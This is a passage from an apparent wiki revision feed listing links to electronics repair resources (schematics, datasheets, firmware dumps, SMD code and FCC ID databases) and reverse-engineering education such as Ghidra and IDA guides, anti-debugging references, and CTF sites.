::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3134</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3134"/>
		<updated>2025-07-08T15:17:03Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: added cp Anti-Debug Tricks&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] - Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
